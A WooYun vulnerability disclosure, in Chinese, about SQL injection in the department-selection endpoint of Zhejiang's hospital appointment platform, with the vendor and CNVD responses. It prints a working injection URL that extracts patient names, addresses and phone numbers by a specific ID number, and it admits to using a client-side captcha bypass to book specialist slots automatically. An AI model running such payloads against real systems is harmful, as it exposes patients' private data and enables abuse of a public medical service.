漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-05380
漏洞标题:浙江省医院预约挂号统一平台选择部门ajax存在SQL注射
相关厂商:浙江省医院预约挂号统一平台
漏洞作者: kamatyo
提交时间:2012-03-19 16:04
修复时间:2012-05-03 16:04
公开时间:2012-05-03 16:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-03-19: 细节已通知厂商并且等待厂商处理中
2012-03-23: 厂商已经确认,细节仅向厂商公开
2012-04-02: 细节向核心白帽子及相关领域专家公开
2012-04-12: 细节向普通白帽子公开
2012-04-22: 细节向实习白帽子公开
2012-05-03: 细节向公众公开
简要描述:
首页上选择地区、医院、部门时会触发GET请求,该请求存在注入
详细说明:
http://guahao.zjol.com.cn//ashx/getDepList.ashx?area=0571111' union select PAT_NAME,PAT_ADDR,PAT_MPCODE from PATIENT where PAT_IDCODE='330104198504131148' AND '1'='1
另外这个网站的登录和挂号使用的验证码为客户端验证,可绕过进行自动挂号,当初利用这个问题挂过N个专家号,挺好用,不知道现在还是否存在,可一并验证。
漏洞证明:
修复方案:
过滤、参数化
版权声明:转载请注明来源 kamatyo@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2012-03-23 15:30
厂商回复:
CNVD对SQL注入漏洞进行了复现,对于提及的自动挂号漏洞未能复现。
这是该网站被披露的第三起漏洞事件。
CVSS评分评级:(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:N) score:4.96(中危)
解释:发起远程攻击、攻击难度低、不需要用户认证、对机密性造成部分影响,不影响可用性、完整性。
技术难度系数:1.0 (一般)
影响危害系数:1.3(较严重,遍历身份证号后查得对应手机号码和姓名)
CNVD综合评分:4.96*1.0*1.3=6.448
最新状态:
暂无